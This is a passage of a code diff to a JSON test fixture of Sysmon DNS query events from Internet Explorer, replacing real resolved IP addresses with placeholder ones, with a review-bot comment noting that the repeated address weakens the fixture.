Name='QueryName'\u003epx.ads.linkedin.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 mix.linkedin.com;type: 5 any-na.mix.linkedin.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon" }, "winlog": { 
@@ -1127,7 +1127,7 @@
 "event_data": {
 "QueryName": "px.ads.linkedin.com",
 "QueryStatus": "0",
- "QueryResults": "type: 5 mix.linkedin.com;type: 5 any-na.mix.linkedin.com;::ffff:108.174.10.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;",
+ "QueryResults": "type: 5 mix.linkedin.com;type: 5 any-na.mix.linkedin.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:02.727",
 "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}",
@@ -1153,7 +1153,7 @@
 "winlog": {
 "time_created": "2019-07-18T03:34:03.029Z",
 "event_data": {
- "QueryResults": "type: 5 login.msa.msidentity.com;type: 5 lgin.msa.trafficmanager.net;::ffff:40.90.23.239;::ffff:40.90.23.213;::ffff:40.90.23.154;",
+ "QueryResults": "type: 5 login.msa.msidentity.com;type: 5 lgin.msa.trafficmanager.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:02.733",
 "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}",
@@ -1184,7 +1184,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029260200Z'/\u003e\u003cEventRecordID\u003e89\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.733\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003elogin.live.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 login.msa.msidentity.com;type: 5 lgin.msa.trafficmanager.net;::ffff:40.90.23.239;::ffff:40.90.23.213;::ffff:40.90.23.154;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029260200Z'/\u003e\u003cEventRecordID\u003e89\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.733\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003elogin.live.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 login.msa.msidentity.com;type: 5 lgin.msa.trafficmanager.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" } }, { 
@@ -1193,7 +1193,7 @@ "provider": "Microsoft-Windows-Sysmon", "code": "22", "kind": "event", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029315200Z'/\u003e\u003cEventRecordID\u003e90\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.792\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edis.criteo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:74.119.119.150;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029315200Z'/\u003e\u003cEventRecordID\u003e90\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.792\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edis.criteo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" }, "winlog": { "version": 5, 
@@ -1212,7 +1212,7 @@
 "ProcessId": "2736",
 "QueryName": "dis.criteo.com",
 "QueryStatus": "0",
- "QueryResults": "::ffff:74.119.119.150;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;",
+ "QueryResults": "::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:02.792"
 },
@@ -1236,7 +1236,7 @@ { "@timestamp": "2021-05-05T15:30:51.696Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029331100Z'/\u003e\u003cEventRecordID\u003e91\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.792\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eib.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 g.geogslb.com;type: 5 ib.anycast.adnxs.com;::ffff:68.67.180.12;::ffff:68.67.179.228;::ffff:68.67.180.44;::ffff:204.13.192.141;::ffff:68.67.178.230;::ffff:68.67.178.252;::ffff:68.67.179.23;::ffff:68.67.179.232;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029331100Z'/\u003e\u003cEventRecordID\u003e91\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.792\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eib.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 g.geogslb.com;type: 5 ib.anycast.adnxs.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "code": "22", "kind": "event" 
@@ -1255,7 +1255,7 @@
 "provider_guid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}",
 "level": "information",
 "event_data": {
- "QueryResults": "type: 5 g.geogslb.com;type: 5 ib.anycast.adnxs.com;::ffff:68.67.180.12;::ffff:68.67.179.228;::ffff:68.67.180.44;::ffff:204.13.192.141;::ffff:68.67.178.230;::ffff:68.67.178.252;::ffff:68.67.179.23;::ffff:68.67.179.232;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;",
+ "QueryResults": "type: 5 g.geogslb.com;type: 5 ib.anycast.adnxs.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:02.792",
 "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}",
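Review bot: Collapsing all eight distinct A-record answers into the same literal `::ffff:89.160.20.156` makes the `+` line a weaker fixture than the one it replaces: a pipeline regression that deduplicated, truncated or mis-split the `;`-separated `QueryResults` list would now yield the same expected output and go unnoticed. If the supported subset contains more than one address, spreading two or three different ones across the list would preserve the original fixture's ability to catch such bugs. If only one address is usable, it would help to say so in the PR description so the next person regenerating this file does not "fix" the duplication.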
@@ -1277,7 +1277,7 @@ "event": { "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029339900Z'/\u003e\u003cEventRecordID\u003e92\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.809\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecm.g.doubleclick.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead.l.doubleclick.net;::ffff:172.217.10.34;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029339900Z'/\u003e\u003cEventRecordID\u003e92\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.809\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecm.g.doubleclick.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead.l.doubleclick.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22" }, "winlog": { @@ -1295,7 +1295,7 @@ }, "event_data": { "QueryStatus": "0", - "QueryResults": "type: 5 pagead.l.doubleclick.net;::ffff:172.217.10.34;", + "QueryResults": "type: 5 pagead.l.doubleclick.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:02.809", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", 
@@ -1314,7 +1314,7 @@ { "@timestamp": "2021-05-05T15:30:51.696Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029350100Z'/\u003e\u003cEventRecordID\u003e93\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.821\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ematch.adsrvr.org\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 match-975362022.us-east-1.elb.amazonaws.com;::ffff:54.208.129.24;::ffff:54.175.5.93;::ffff:52.86.210.96;::ffff:3.93.252.59;::ffff:54.86.97.130;::ffff:34.194.239.194;::ffff:3.94.67.102;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029350100Z'/\u003e\u003cEventRecordID\u003e93\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.821\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ematch.adsrvr.org\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 match-975362022.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -1326,7 +1326,7 @@
 },
 "event_data": {
 "QueryStatus": "0",
- "QueryResults": "type: 5 match-975362022.us-east-1.elb.amazonaws.com;::ffff:54.208.129.24;::ffff:54.175.5.93;::ffff:52.86.210.96;::ffff:3.93.252.59;::ffff:54.86.97.130;::ffff:34.194.239.194;::ffff:3.94.67.102;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;",
+ "QueryResults": "type: 5 match-975362022.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:02.821",
 "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}",
@@ -1353,7 +1353,7 @@ { "@timestamp": "2021-05-05T15:30:51.696Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029358900Z'/\u003e\u003cEventRecordID\u003e94\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.821\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003essum-sec.casalemedia.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ssum-sec.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:23.52.162.21;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029358900Z'/\u003e\u003cEventRecordID\u003e94\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.821\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003essum-sec.casalemedia.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ssum-sec.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -1372,7 +1372,7 @@ "ProcessId": "2736", "QueryName": "ssum-sec.casalemedia.com", "QueryStatus": "0", - "QueryResults": "type: 5 ssum-sec.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:23.52.162.21;" + "QueryResults": "type: 5 ssum-sec.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:89.160.20.156;" }, "level": "information", "process": { 
